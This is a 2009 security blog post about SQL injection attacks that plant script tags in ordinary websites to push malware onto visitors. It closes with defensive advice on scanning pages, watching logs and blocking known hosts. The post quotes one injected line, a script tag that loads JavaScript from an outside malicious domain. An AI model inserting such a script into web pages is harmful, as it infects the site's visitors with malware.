Sister CISA CISSP

Aug 30 2009   12:46AM GMT

Securing ALL Your Web Services



Posted by: Arian Eigen Heald
Tags:
Admins and Auditors
information security
Tools for Auditing and Security

A number of commentators, notably IBM’s Kris Lamb, have reported that malicious code is no longer limited, for the most part, to p0rn and other sleazy websites. Hackers are targeting the more commonly used education, healthcare, blogging and small ecommerce websites where they can come in and insert hostile code which will forward the user’s browser to download malware.

“We’ve reached a tipping point where every website should be viewed as suspicious and every user is at risk,” Lamb said in a statement. “The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity.”

The primary mode of attack appears to be SQL Injection, which still remains vulnerable because coding user input on a website correctly is technically challenging. So the bad guys hack in, drop a script such as :

“script src=http://a0v.org/x.js”

And it runs every time someone visits the page, silently installing malware in the background.

If you run a query in Google, around 60,000 websites have this embedded in their page code. Needless to say, don’t visit any of them. I used Google to check the three websites I support via the “site:” search function. You can, too.

What to do? Use some freeware or shareware to do an initial scan for vulnerabilities. Scan your web pages for odd looking script sources. If you find them, you’ll know your web code is vulnerable somewhere. Set about finding where in a hurry, because the bad guy, or some other bad guy will find it again.

Next, take a look at anything else coming in through your firewall: FTP, email and terminal services/Citrix. Consider any opening a vector for attack, even if you have locked down the external IP
sources. Watch the logs carefully and daily.

Finally, watch outbound connections for known sites, such as the one above. Keep your ear out on security sites for the latest of those, and block connections to them from your firewall until they can be shut down.

More work, of course, but much LESS work than a successful attack!

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: